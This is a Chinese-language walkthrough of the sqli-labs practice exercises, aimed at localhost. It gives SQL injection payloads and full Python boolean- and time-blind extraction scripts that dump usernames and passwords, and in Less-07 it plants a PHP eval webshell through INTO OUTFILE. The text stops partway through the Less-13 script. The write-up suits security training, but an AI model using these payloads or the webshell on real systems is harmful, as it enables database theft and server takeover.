sqli-labs WriteUps

开坑sqli-labs，一天已更新~

注入思路

1. 判断是否存在注入
2. 判断注入类型
3. 判断字段数
4. 注数据库名
5. 注表名
6. 注列名
7. 注数据

Less-01 GET型单引号字符型注入

#判断是否存在SQL注入
http://localhost/Less-1/?id=1 访问正常有回显
http://localhost/Less-1/?id=1' 访问报错
http://localhost/Less-1/?id=1 and 1=1  访问正常有回显
http://localhost/Less-1/?id=1 and 1=2  访问正常有回显
http://localhost/Less-1/?id=1' and '1'='1 访问正常有回显
http://localhost/Less-1/?id=1' and '1'='2 访问正常无回显，为字符型注入

#判断字段数
http://localhost/Less-1/?id=1' order by 3 --+ 访问正常
http://localhost/Less-1/?id=1' order by 4 --+ 查无此列，证明字段为3

#判断显示位
http://localhost/Less-1/?id=-1' union select 1,2,3 --+ 回显2和3，所以字段2,3可用来注入

#注数据库和用户
http://localhost/Less-1/?id=-1' union select 1,user(),database() --+ 

#查询所有数据库名
http://localhost/Less-1/?id=-1' union select 1,database(),schema_name from information_schema.schemata --+

#查询所有表名
http://localhost/Less-1/?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+

#查询所有列名
http://localhost/Less-1/?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users'and table_schema='security' --+

#查询数据
http://localhost/Less-1/?id=-1' union select 1,database(),group_concat(username,0x3a,password) from users --+

Less-02 GET整型数字注入

#判断是否存在注入
http://localhost/Less-2/?id=1  访问正常有回显
http://localhost/Less-2/?id=1' 访问报错，可能是存在注入

#存在注入类型
http://localhost/Less-2/?id=1' and '1'='1  访问报错
http://localhost/Less-2/?id=1 and 1=1 访问正常有回显
http://localhost/Less-2/?id=1 and 1=2 访问正常无回显，证明是数字型注入

#判断字段数
http://localhost/Less-2/?id=1 order by 3  回显正常
http://localhost/Less-2/?id=1 order by 4  查无此列，所以字段数为3

#查询显示位
http://localhost/Less-2/?id=-1 union select 1,2,3 回显2,3

#查询数据库名
http://localhost/Less-2/?id=-1 union select 1,database(),group_concat(schema_name) from information_schema.schemata

#查询表名
http://localhost/Less-2/?id=-1 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()

#查询列名
http://localhost/Less-2/?id=-1 union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'

#查询数据
http://localhost/Less-2/?id=-1 union select 1,database(),group_concat(username,0x3a,password) from users

Less-03 单括号单引号字符型住入

#判断是否存在注入
http://localhost/Less-3/?id=1 访问正常有回显
http://localhost/Less-3/?id=1' 访问报错，错误提示出现),猜测为括号闭合http://localhost/Less-3/?id=1') 访问报错，仍然出现)
http://localhost/Less-3/?id=1') --+ 访问正常有回显，存在注入

#判断注入类型
http://localhost/Less-3/?id=1 and 1=2) --+ 访问正常有回显
http://localhost/Less-3/?id=1 and 1=1) --+ 访问正常有回显
http://localhost/Less-3/?id=1' and 1=1) --+ 访问正常有回显
http://localhost/Less-3/?id=1' and 1=2) --+访问正常无回显，存在括号闭合字符型注入

#判断字段数
http://localhost/Less-3/?id=1') order by 4 --+ 查无此列
http://localhost/Less-3/?id=1') order by 3 --+ 访问正常有回显

#判断显示位
http://localhost/Less-3/?id=-1') union select 1,2,3 --+ 回显2，3

#查询数据库
http://localhost/Less-3/?id=-1') union select 1,database(),group_concat(schema_name) from information_schema.schemata --+

#查询表名
http://localhost/Less-3/?id=-1') union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+

#查询字段
http://localhost/Less-3/?id=-1') union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users' --+

#查询数据
http://localhost/Less-3/?id=-1') union select 1,database(),group_concat(username,0x3a,password) from users --+

Less-04 双引号单括号字符型注入

# 判断是否存在注入
http://localhost/Less-4/?id=1 访问正常有回显
http://localhost/Less-4/?id=1' 访问正常有回显
http://localhost/Less-4/?id=1" 访问报错，错误提示有)
http://localhost/Less-4/?id=1") --+ 访问正常有回显，存在注入

# 判断注入类型
http://localhost/Less-4/?id=1 and 1=1) --+ 访问正常有回显
http://localhost/Less-4/?id=1 and 1=2) --+ 访问正常有回显
http://localhost/Less-4/?id=1" and "1"="1") --+ 访问正常有回显
http://localhost/Less-4/?id=1" and "1"="2") --+ 访问正常无回显，证明存在双引号单括号字符型注入

#判断字段数
http://localhost/Less-4/?id=1") order by 4 --+ 查无此列
http://localhost/Less-4/?id=1") order by 3 --+ 访问正常有回显

#判断显示位
http://localhost/Less-4/?id=-1") union select 1,2,3 --+ 回显2，3

#查询数据库名
http://localhost/Less-4/?id=-1") union select 1,database(),group_concat(schema_name) from information_schema.schemata --+

#查询表名
http://localhost/Less-4/?id=-1") union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+

#查询列名
http://localhost/Less-4/?id=-1") union select 1,database(),group_concat(column_name) from information_schema.columns where table_name="users" and table_schema=database() --+

#查询字段
http://localhost/Less-4/?id=-1") union select 1,database(),group_concat(username,0x3a,password) from users --+

Less-05 单引号报错注入

#判断是否有注入
http://localhost/Less-5/?id=1 访问正常有回显
http://localhost/Less-5/?id=1' 访问报错,基本确定存在注入

#判断注入类型
http://localhost/Less-5/?id=1 and 1=1 访问正常有回显
http://localhost/Less-5/?id=1 and 1=2 访问正常有回显
http://localhost/Less-5/?id=1' and '1'='1 访问正常有回显
http://localhost/Less-5/?id=1' and '1'='2 访问正常无回显

#尝试报错注入
http://localhost/Less-5/?id=1' and updatexml(1,concat(0x7e,(version()),0x7e),0) %23 成功爆出版本信息

#查询数据库名
http://localhost/Less-5/?id=1' and updatexml(1,concat(0x7e,(database()),0x7e),0) %23 

#查询表名
http://localhost/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),0) %23

#查询列名
http://localhost/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),0) %23

#查询数据(注意updatexml一次只可显示32位数据，查询全部数据需多次查询)
http://localhost/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),0) %23

Less-06 双引号报错注入

#判断是否存在注入
http://localhost/Less-6/?id=1  访问正常有回显
http://localhost/Less-6/?id=1' 访问正常有回显
http://localhost/Less-6/?id=1" 访问报错，基本确定存在注入

#判断注入类型
http://localhost/Less-6/?id=1 and 1=1 访问正常有回显
http://localhost/Less-6/?id=1 and 1=2 访问正常有回显
http://localhost/Less-6/?id=1" and "1"="1  访问正常有回显
http://localhost/Less-6/?id=1" and "1"="2  访问正常无回显，为双引号字符型

#查询字段数
http://localhost/Less-6/?id=1" order by 3 %23 访问正常有回显
http://localhost/Less-6/?id=1" order by 4 %23 查无此列

#尝试使用报错注入
http://localhost/Less-6/?id=1" and exp(~(select * from(select user())a)) %23 成功报出user信息

#查询数据库名
http://localhost/Less-6/?id=1" and exp(~(select * from(select database())a)) %23

#查询表名
http://localhost/Less-6/?id=1" and exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a)) %23

#查询字段名
http://localhost/Less-6/?id=1" and exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_name='users')a)) %23

#查询数据
http://localhost/Less-6/?id=1" and exp(~(select * from(select group_concat(username,0x3a,password) from users)a)) %23

Less-07 利用select outinto file写文件

简单测试可以发现就两种情况，正确查询切有结果就为访问正常，语法错误或者查询没有结果就会语法报错，但是不一定是真正的语法错误

#判断是否存在注入
http://localhost/Less-7/?id=1  访问正常，提示use outfile
http://localhost/Less-7/?id=1' 访问报错,基本确定存在注入

#判断注入类型
http://localhost/Less-7/?id=1' and '1'='1  访问正常
http://localhost/Less-7/?id=1' and '1'='2  报语法错,基本确定为字符型注入

但是在order by 1的时候，竟然报语法错了，这不合理因为肯定至少存在一个字段，看了源码才知道是((‘$id’))这么包着的，而且没回显明确的错误信息，这个有点不好想，需要借助fuzz的思想来测试，于是继续注入

#判断字段数
http://localhost/Less-7/?id=1')) order by 3%23   访问正常
http://localhost/Less-7/?id=1')) order by 4%23   访问报错，所以字段为3

#outfile into注入
http://localhost/Less-7/?id=1')) union select 1,"<?php @eval($_POST['shell']);?>",3 into outfile "/var/www/html/shell.php" %23

菜刀连接一句话木马getshell即可

添加数据库配置文件后查询数据即可

Less-08 基于布尔的盲注

这里简单说一下，盲注就是只会回显两种情况，这两种情况可以是1和2，也可以是有和无，分别对应着对和错，思路如下

• 判断数据库名长度
• 判断数据库名
• 判断表数量
• 判断表名长度
• 判断表名
• 判断字段数量
• 判断字段长度
• 判断字段名
• 判断数据数量
• 判断数据长度
• 判断数据

给一个自己写的盲注脚本，但是时间复杂度比较大，对于性能不好的服务器会出现丢包，导致数据不准确，有待用二分法改进

# -*- coding: UTF-8 -*-
import requests
dblength=0
#爆破数据库名长度
while True:
    url='http://localhost/Less-8/index.php?id=-1%27 or length(database())='+str(dblength)+'%23'
    text=requests.get(url).text
    if 'You are in...........' in text:
        break
    else:
        dblength=dblength+1
print("数据库长度为%d"%dblength)

#爆破数据库名
dbname=''
for i in range(dblength):
        for j in range(32,127):
            url='http://localhost/Less-8/index.php?id=-1%27 or ascii(substr(database(),'+str(i+1)+',1))='+str(j)+' %23'
            text=requests.get(url).text
            if 'You are in...........' in text:
                dbname=dbname+chr(j)
                break
            else:
                continue
print("数据库名为%s"%dbname)

#爆破表数量
tablenum=0
while True:
    url='http://localhost/Less-8/index.php?id=-1%27 or (select count(table_name) from information_schema.tables where table_schema=database())='+str(tablenum)+'%23'
    text=requests.get(url).text
    if 'You are in...........' in text:
        break
    else:
        tablenum=tablenum+1
print("表数量为%d"%tablenum)

#爆破表长度
tablelength=[]
for i in range(tablenum):
    temlength=0
    while True:
        url='http://localhost/Less-8/index.php?id=-1%27 or length(substr((select table_name from information_schema.tables where table_schema=database() limit '+str(i)+',1),1))='+str(temlength)+' %23'
        text=requests.get(url).text
        if 'You are in...........' in text:
            tablelength.append(temlength)
            break
        else:
            temlength=temlength+1
            continue

print("表的名称长度数组为：",end='%s\n'%tablelength)

#爆破表名
tablename=[]
for i in range(tablenum):
    temname=''
    for j in range(tablelength[i]):
        for k in range(32,127):
            url='http://localhost/Less-8/index.php?id=-1%27 or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit '+str(i)+',1),'+str(j+1)+',1))='+str(k)+' %23'
            text=requests.get(url).text
            if 'You are in...........' in text:
                temname=temname+chr(k)
                break                
            else:
                continue
    tablename.append(temname)
print("表名数组为：",end='%s\n'%tablename)

#爆破users表的字段数量
columnnum=0
while True:
    url='http://localhost/Less-8/index.php?id=-1%27 or (select count(column_name) from information_schema.columns where table_schema=database() and table_name=%27users%27)='+str(columnnum)+'%23'
    text=requests.get(url).text
    if 'You are in...........' in text:
        break
    else:
        columnnum=columnnum+1
print("users字段数量:%d"%columnnum)

#爆破users表字段长度
columnlength=[]
for i in range(columnnum):
    temlength=0
    while True:
        url='http://localhost/Less-8/index.php?id=-1%27 or length(substr((select column_name from information_schema.columns where table_schema=database() and table_name=%27users%27 limit '+str(i)+',1),1))='+str(temlength)+' %23'
        text=requests.get(url).text
        if 'You are in...........' in text:
            columnlength.append(temlength)
            break
        else:
            temlength=temlength+1
            continue
print("users表字段长度数组:",end='%s\n'%columnlength)

#爆破users表字段名
columnname=[]
for i in range(columnnum):
    temname=''
    for j in range(columnlength[i]):
        for k in range(32,127):
            url='http://localhost/Less-8/index.php?id=-1%27 or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=%27users%27 limit '+str(i)+',1),'+str(j+1)+',1))='+str(k)+' %23'
            text=requests.get(url).text
            if 'You are in...........' in text:
                temname=temname+chr(k)
                break               
            else:
                continue
    columnname.append(temname)
print("users字段数组为：",end='%s\n'%columnname)

#爆破users表的数据数量
datanum=0
while True:
    url='http://localhost/Less-8/index.php?id=-1%27 or (select count(*) from users)='+str(datanum)+'%23'
    text=requests.get(url).text
    if 'You are in...........' in text:
        break
    else:
        datanum=datanum+1
print("users表数据数量为%d"%datanum)

#爆破所有数据长度
datalength=[]
for i in range(datanum):        #每组数据
    temlength=[]
    for j in range(columnnum):  #每个字段
        tem=0
        while True:   
            url='http://localhost/Less-8/index.php?id=-1%27 or length(substr((select '+columnname[j]+' from users limit '+str(i)+',1),1))='+str(tem)+' %23'
            text=requests.get(url).text
            if 'You are in...........' in text:
                break
            else:
                tem=tem+1
                continue
        temlength.append(tem)
    datalength.append(temlength)
print("users数据长度数组为：",end='%s\n'%datalength)

#爆破数据
data=[]
for i in range(datanum):        #每组数据
    temdata=[]
    for j in range(columnnum):  #每个字段
        tem=''
        for  pos in range(datalength[i][j]):    #每个位置
            for k in range(32,127):                                        
                url='http://localhost/Less-8/index.php?id=-1%27 or ascii(substr((select '+columnname[j]+' from users limit '+ str(i)+',1),'+str(pos+1)+',1))='+str(k)+' %23'
                text=requests.get(url).text
                if 'You are in...........' in text:
                    tem=tem+chr(k)
                    break
                else:
                    continue
        temdata.append(tem)
    data.append(temdata)
    print(temdata)      
print("users数据数组为：",end='%s\n'%data)

Less-09 基于单引号的时间盲注

自动化脚本如下

import requests
timeout=3
for dblen in range(0,50):
    url="http://localhost/Less-9/?id=1'and if(length(database())=%d,sleep(3),1)%%23"%dblen
    try:
        requests.get(url,timeout=timeout)
    except requests.exceptions.ReadTimeout :
        dblength=dblen
        break 
print("数据库长度为%d"%dblength)   

dbname=''
for pos in range(1,dblength+1):
    for i in range(32,128):
        url="http://localhost/Less-9/?id=1'and if(ascii(substr((select database()),%d,1))=%d,sleep(3),1)%%23"%(pos,i)
        try:
            requests.get(url,timeout=timeout)
        except requests.exceptions.ReadTimeout :
            dbname=dbname+chr(i)
            break
print("数据库名为%s"%dbname)

tablenum=0
for tablecount in range(0,50):
    url="http://localhost/Less-9/?id=1'and if((select count(*) from information_schema.tables where table_schema=database())=%d,sleep(3),1)%%23"%tablecount
    try:
        requests.get(url,timeout=timeout)
    except requests.exceptions.ReadTimeout :
        tablenum=tablecount
        break 
print("表数量为%d"%tablenum)    
tablename_len=[]
for num in range(0,tablenum):
    for tablenamelen in range(0,50):
        url="http://localhost/Less-9/?id=1'and if((select length(table_name) from information_schema.tables where table_schema=database() limit %d,1)=%d,sleep(3),1)%%23"%(num,tablenamelen)
        try:
            requests.get(url,timeout=timeout)
        except requests.exceptions.ReadTimeout :
            tablename_len.append(tablenamelen)
            break 
print("表名长度列表为:",tablename_len)  

tablename=[]
for num in range(0,tablenum):
    tmp_name=''
    for pos in range(1,tablename_len[num]+1):
        for i in range(32,128):
            url="http://localhost/Less-9/?id=1'and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),1)%%23"%(num,pos,i)
            try:
                requests.get(url,timeout=timeout)
            except requests.exceptions.ReadTimeout :
                tmp_name=tmp_name+chr(i)
                break        
    tablename.append(tmp_name)
print('表名列表为',tablename)

columnnum=0
tabledump='users'
for columncount in range(0,50):
    url="http://localhost/Less-9/?id=1'and if((select count(*) from information_schema.columns where table_name=\'%s\')=%d,sleep(3),1)%%23"%(tabledump,columncount)
    try:
        requests.get(url,timeout=timeout)
    except requests.exceptions.ReadTimeout :
        columnnum=columncount
        break 
print("%s表字段数量为%d"%(tabledump,columnnum))  

columnname_len=[]
for num in range(0,columnnum):
    for columnnamelen in range(0,50):
        url="http://localhost/Less-9/?id=1'and if((select length(column_name) from information_schema.columns where table_name=\'%s\' limit %d,1)=%d,sleep(3),1)%%23"%(tabledump,num,columnnamelen)
        try:
            requests.get(url,timeout=timeout)
        except requests.exceptions.ReadTimeout :
            columnname_len.append(columnnamelen)
            break 
print("%s表字段长度列表为:"%tabledump,columnname_len)  

columnname=[]
for num in range(0,columnnum):
    tmp_name=''
    for pos in range(1,columnname_len[num]+1):
        for i in range(32,128):
            url="http://localhost/Less-9/?id=1'and if(ascii(substr((select column_name from information_schema.columns where table_name=\'%s\' limit %d,1),%d,1))=%d,sleep(3),1)%%23"%(tabledump,num,pos,i)
            try:
                requests.get(url,timeout=timeout)
            except requests.exceptions.ReadTimeout :
                tmp_name=tmp_name+chr(i)
                break        
    columnname.append(tmp_name)
print("%s表的字段为"%tabledump,columnname)

datanum=0
tabledump='users'
for datacount in range(0,50):
    url="http://localhost/Less-9/?id=1'and if((select count(*) from %s)=%d,sleep(3),1)%%23"%(tabledump,datacount)
    try:
        requests.get(url,timeout=timeout)
    except requests.exceptions.ReadTimeout :
        datanum=datacount
        break 
print("%s表数据数量为%d"%(tabledump,datanum)) 

dataname_len=[]
for num in range(0,datanum):
    tmp=[]
    for column in columnname:
        for datalen in range(0,50):
            url="http://localhost/Less-9/?id=1'and if((select length(%s) from %s limit %d,1)=%d,sleep(3),1)%%23"%(column,tabledump,num,datalen)
            try:
                requests.get(url,timeout=timeout)
            except requests.exceptions.ReadTimeout :
                tmp.append(datalen)
                break
    dataname_len.append(tmp)
print("%s表字段长度列表为:"%tabledump,dataname_len)  
data=[]
for num in range(0,datanum):
    tmp=[]
    for column in range(0,len(columnname)):
        tmp_data=''
        for pos in range(1,dataname_len[num][column]+1):
            for i in range(32,128):
                url="http://localhost/Less-9/?id=1'and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d,sleep(3),1)%%23"%(columnname[column],tabledump,num,pos,i)
                try:
                    requests.get(url,timeout=timeout)
                except requests.exceptions.ReadTimeout :
                    tmp_data=tmp_data+chr(i)
                    break        
        tmp.append(tmp_data)
    print(tmp)
    data.append(tmp)
print(data)

Less-10 基于双引号的时间盲注

import requests
timeout=3
for dblen in range(0,50):
    url='http://localhost/Less-10/?id=1" and if(length(database())=%d,sleep(3),1)%%23'%dblen
    try:
        requests.get(url,timeout=timeout)
    except requests.exceptions.ReadTimeout :
        dblength=dblen
        break 
print("数据库长度为%d"%dblength)   

dbname=''
for pos in range(1,dblength+1):
    for i in range(32,128):
        url='http://localhost/Less-10/?id=1" and if(ascii(substr((select database()),%d,1))=%d,sleep(3),1)%%23'%(pos,i)
        try:
            requests.get(url,timeout=timeout)
        except requests.exceptions.ReadTimeout :
            dbname=dbname+chr(i)
            break
print("数据库名为%s"%dbname)

tablenum=0
for tablecount in range(0,50):
    url='http://localhost/Less-10/?id=1" and if((select count(*) from information_schema.tables where table_schema=database())=%d,sleep(3),1)%%23'%tablecount
    try:
        requests.get(url,timeout=timeout)
    except requests.exceptions.ReadTimeout :
        tablenum=tablecount
        break 
print("表数量为%d"%tablenum)    
tablenum=4
tablename_len=[]
for num in range(0,tablenum):
    for tablenamelen in range(0,50):
        url='http://localhost/Less-10/?id=1" and if((select length(table_name) from information_schema.tables where table_schema=database() limit %d,1)=%d,sleep(3),1)%%23'%(num,tablenamelen)
        try:
            requests.get(url,timeout=timeout)
        except requests.exceptions.ReadTimeout :
            tablename_len.append(tablenamelen)
            break 
print("表名长度列表为:",tablename_len)  

tablename=[]
for num in range(0,tablenum):
    tmp_name=''
    for pos in range(1,tablename_len[num]+1):
        for i in range(32,128):
            url='http://localhost/Less-10/?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d,sleep(3),1)%%23'%(num,pos,i)
            try:
                requests.get(url,timeout=timeout)
            except requests.exceptions.ReadTimeout :
                tmp_name=tmp_name+chr(i)
                break        
    tablename.append(tmp_name)
print('表名列表为',tablename)

columnnum=0
tabledump='users'
for columncount in range(0,50):
    url='http://localhost/Less-10/?id=1" and if((select count(*) from information_schema.columns where table_name=\'%s\')=%d,sleep(3),1)%%23'%(tabledump,columncount)
    try:
        requests.get(url,timeout=timeout)
    except requests.exceptions.ReadTimeout :
        columnnum=columncount
        break 
print("%s表字段数量为%d"%(tabledump,columnnum))  

columnname_len=[]
for num in range(0,columnnum):
    for columnnamelen in range(0,50):
        url='http://localhost/Less-10/?id=1" and if((select length(column_name) from information_schema.columns where table_name=\'%s\' limit %d,1)=%d,sleep(3),1)%%23'%(tabledump,num,columnnamelen)
        try:
            requests.get(url,timeout=timeout)
        except requests.exceptions.ReadTimeout :
            columnname_len.append(columnnamelen)
            break 
print("%s表字段长度列表为:"%tabledump,columnname_len)  

columnname=[]
for num in range(0,columnnum):
    tmp_name=''
    for pos in range(1,columnname_len[num]+1):
        for i in range(32,128):
            url='http://localhost/Less-10/?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_name=\'%s\' limit %d,1),%d,1))=%d,sleep(3),1)%%23'%(tabledump,num,pos,i)
            try:
                requests.get(url,timeout=timeout)
            except requests.exceptions.ReadTimeout :
                tmp_name=tmp_name+chr(i)
                break        
    columnname.append(tmp_name)
print("%s表的字段为"%tabledump,columnname)

datanum=0
tabledump='users'
for datacount in range(0,50):
    url='http://localhost/Less-10/?id=1" and if((select count(*) from %s)=%d,sleep(3),1)%%23'%(tabledump,datacount)
    try:
        requests.get(url,timeout=timeout)
    except requests.exceptions.ReadTimeout :
        datanum=datacount
        break 
print("%s表数据数量为%d"%(tabledump,datanum)) 

dataname_len=[]
for num in range(0,datanum):
    tmp=[]
    for column in columnname:
        for datalen in range(0,50):
            url='http://localhost/Less-10/?id=1" and if((select length(%s) from %s limit %d,1)=%d,sleep(3),1)%%23'%(column,tabledump,num,datalen)
            try:
                requests.get(url,timeout=timeout)
            except requests.exceptions.ReadTimeout :
                tmp.append(datalen)
                break
    dataname_len.append(tmp)
print("%s表字段长度列表为:"%tabledump,dataname_len)  
data=[]
for num in range(0,datanum):
    tmp=[]
    for column in range(0,len(columnname)):
        tmp_data=''
        for pos in range(1,dataname_len[num][column]+1):
            for i in range(32,128):
                url='http://localhost/Less-10/?id=1" and if(ascii(substr((select %s from %s limit %d,1),%d,1))=%d,sleep(3),1)%%23'%(columnname[column],tabledump,num,pos,i)
                try:
                    requests.get(url,timeout=timeout)
                except requests.exceptions.ReadTimeout :
                    tmp_data=tmp_data+chr(i)
                    break        
        tmp.append(tmp_data)
    print(tmp)
    data.append(tmp)
print(data)

Less-11 POST型单引号字符型注入

#判断是否存在注入
uname=admin&passwd=2&submit=Submit  访问正常
uname=admin'&passwd=2&submit=Submit 语法报错，应该是存在注入

#判断注入类型
uname=admin and 1=1&passwd=admin&submit=Submit 访问正常无回显
uname=admin and 1=2&passwd=admin&submit=Submit 访问正常无回显
uname=admin' and '1'='1&passwd=admin&submit=Submit 访问正常有回显
uname=admin' and '1'='2&passwd=admin&submit=Submit 访问正常无回显，应该是zi

#判断字段数
uname=admin' order by 2%23&passwd=admin&submit=Submit
uname=admin' order by 3%23&passwd=admin&submit=Submit 

#判断显示位
uname=' union select 1,2%23&passwd=admin&submit=Submit  回显1,2

#查询数据库
uname=' union select database(),2%23&passwd=admin&submit=Submit

#查询表名
uname=' union select database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23&passwd=admin&submit=Submit

#查询列名
uname=' union select database(),group_concat(column_name) from information_schema.columns where table_name='users'%23&passwd=admin&submit=Submit

#查询字段
uname=' union select database(),group_concat(username,0x3a,password) from users %23&passwd=admin&submit=Submit

Less-12 POST型双引号单括号字符型注入

#判断是否存在注入
uname=admin&passwd=admin&submit=Submit 访问正常有回显
uname=admin'&passwd=admin&submit=Submit 访问正常无回显
uname=admin"&passwd=admin&submit=Submit 语法报错，切错误提示中出现单括号，基本确定存在注入

#判断注入类型
其实因为参数不是数字，这里也没有必要去验证是否是数字型注入
uname=admin") and ("1")=("1&passwd=admin&submit=Submit 访问正常有回显
uname=admin") and ("1")=("2&passwd=admin&submit=Submit 访问正常无回显，基本确定是字符型注入

#判断字段数
uname=admin") order by 2%23&passwd=admin&submit=Submit 访问正常有回显
uname=admin") order by 3%23&passwd=admin&submit=Submit 查无此列

#判断显示位
uname=") union select 1,2%23&passwd=admin&submit=Submit 回显1，2

#查询数据库名
uname=") union select database(),2%23&passwd=admin&submit=Submit

#查询表名
uname=") union select database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23&passwd=admin&submit=Submit

#查询列名
uname=") union select database(),group_concat(column_name) from information_schema.columns where table_name='users'%23&passwd=admin&submit=Submit

#查询数据
uname=") union select database(),group_concat(username,password) from users %23&passwd=admin&submit=Submit

Less-13 POST型单引号单括号字符型报错注入/盲注

#判断是否存在注入
uname=admin&passwd=admin&submit=Submit 访问正常回显登录成功
uname=admin'&passwd=admin&submit=Submit 访问报错，报错信息出现单括号，基本确定存在注入

#判断注入类型
uname=admin') and ('1')=('1&passwd=admin&submit=Submit 访问正常回显登录成功
uname=admin') and ('1')=('2&passwd=admin&submit=Submit 访问正常回显登录失败，基本确定是单引号单括号字符型注入

#判断字段数
uname=admin') order by 2%23&passwd=admin&submit=Submit 访问正常回显登录成功
uname=admin') order by 3%23&passwd=admin&submit=Submit 查无此列，字段数为2

#判断显示位
uname=') union select 1,2%23&passwd=admin&submit=Submit 访问正常回显登陆成功，但没用啊因为我不知道显示位是多少，，，这里改变策略，采用布尔盲注

#查询数据库
uname=admin') and extractvalue(1,concat(0x7e,(select database())))%23&passwd=123&submit=Submit

#查询表名
uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()
)))%23&passwd=123&submit=Submit

#查询列名

uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'
)))%23&passwd=123&submit=Submit

#查询数据(一次回显32位，多次查询即可)
uname=admin') and extractvalue(1,concat(0x7e,(select group_concat(username,password) from users
)))%23&passwd=123&submit=Submit

给出瞎写的盲注脚本(有待二分法优化)

# -*- coding: UTF-8 -*-
import requests
dblength=0
#爆破数据库名长度
while True:
    data={
    'uname':"admin') and length(database())=%d#"%dblength,
    'passwd':'admin',
    'submit':'Submit'
}
    url='http://localhost/Less-13/index.php'
    text=requests.post(url,data).text
    if 'flag' in text:
        break
    else:
        dblength=dblength+1
print("数据库长度为%d"%dblength)

#爆破数据库名
dbname=''
for i in range(dblength):
        for j in range(32,127):
            data={
            'uname':"admin') and ascii(substr(database(),%d,1))=%d#"%(i+1,j),
            'passwd':'admin',
            'submit':'Submit'
}
            url='http://localhost/Less-13/index.php'
            text=requests.post(url,data).text
            if 'flag' in text:
                dbname=dbname+chr(j)
                break
            else:
                continue
print("数据库名为%s"%dbname)

#爆破表数量
tablenum=0
while True:
    data={
    'uname':"admin') and (select count(table_name) from information_schema.tables where table_schema=database())=%d#"%tablenum,
    'passwd':'admin',
    'submit':'Submit'
}
    url='http://localhost/Less-13/index.php'
    text=requests.post(url,data).text
    if 'flag' in text:
        break
    else:
        tablenum=tablenum+1
print("表数量为%d"%tablenum)

#爆破表长度
tablelength=[]
for i in range(tablenum):
    temlength=0
    while True:
        data={
        'uname':"admin') and length(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),1))=%d#"%(i,temlength),
        'passwd':'admin',
        'submit':'Submit'
}
        url='http://localhost/Less-13/index.php'
        text=requests.post(url,data).text
        if 'flag' in text:
            tablelength.append(temlength)
            break
        else:
            temlength=temlength+1
            continue

print("表的名称长度数组为：",end='%s\n'%tablelength)

#爆破表名
tablename=[]
for i in range(tablenum):
    temname=''
    for j in range(tablelength[i]):
        for k in range(32,127):
            data={
            'uname':"admin') and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d#"%(i,j+1,k),
            'passwd':'admin',
            'submit':'Submit'
}
            url='http://localhost/Less-13/index.php'
            text=requests.post(url,data).text
            if 'flag' in text:
                temname=temname+chr(k)
                break
            else:
                continue
    tablename.append(temname)
print("表名数组为：",end='%s\n'%tablename)

#爆破users表的字段数量
columnnum=0
while True:
    data={
    'uname':"admin') and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=%d#"%(columnnum),
    'passwd':'admin',
    'submit':'Submit'
}
    url='http://localhost/Less-13/index.php'
    text=requests.post(url,data).text
    if 'flag' in text:
        break
    else:
        columnnum=columnnum+1
print("users字段数量:%d"%columnnum)

#爆破users表字段长度
columnlength=[]
for i in range(columnnum):
    temlength=0
    while True:
        data={
        'uname':"admin') and length(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit %d,1),1))=%d#'"%(i,temlength),
        'passwd':'admin',
        'submit':'Submit'
}
        url='http://localhost/Less-13/index.php'
        text=requests.post(url,data).text
        if 'flag' in text:
            columnlength.append(temlength)
            break
        else:
            temlength=temlength+1
            continue
print("users表字段长度数组:",end='%s\n'%columnlength)

#爆破users表字段名
columnname=[]
for i in range(columnnum):
    temname=''
    for j in range(columnlength[i]):
        for k in range(32,127):
            data={
            'uname':"admin') and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit %d,1),%d,1))=%d#"%(i,j+1,k),
            'passwd':'admin',
            'submit':'Submit'
}
            url='http://localhost/Less-13/index.php'
            text=requests.post(url,data).text
            if 'flag' in text:
                temname=temname+chr(k)
                break
            else:
                continue
    columnname.append(temname)
print("users字段数组为：",end='%s\n'%columnname)

#爆破users表的数据数量
datanum=0
while True:
    data={
    'uname':"admin') and (select count(*) from users)=%d#"%datanum,
    'passwd':'admin',
    'submit':'Submit'
}
    url='http://localhost/Less-13/index.php'
    text=requests.post(url,data).text
    if 'flag' in text:
        break
    else:
        datanum=datanum+1
print("users表数据数量为%d"%datanum)

#爆破所有数据长度
datalength=[]
for i in range(datanum):        #每组数据
    temlength=[]
    for j in range(columnnum):  #每个字段
        tem=0
        while True:
            data={
            'uname':"admin') and length(substr((select %s from users limit %d,1),1))=%d#"%(columnname[j],i,tem),
            'passwd':'admin',
            'submit':'Submit'
}
            url='http://localhost/Less-13/index.php'
            text=requests.post(url,data).text
            if 'flag' in text:
                break
            else:
                tem=tem+1
                continue
        temlength.append(tem)
    datalength.append(temlength)
print("users数据长度数组为：",end='%s\n'%datalength)

#爆破数据
data=[]
for i in range(datanum):        #每组数据
    temdata=[]
    for j in range(columnnum):  #每个字段
        tem=''
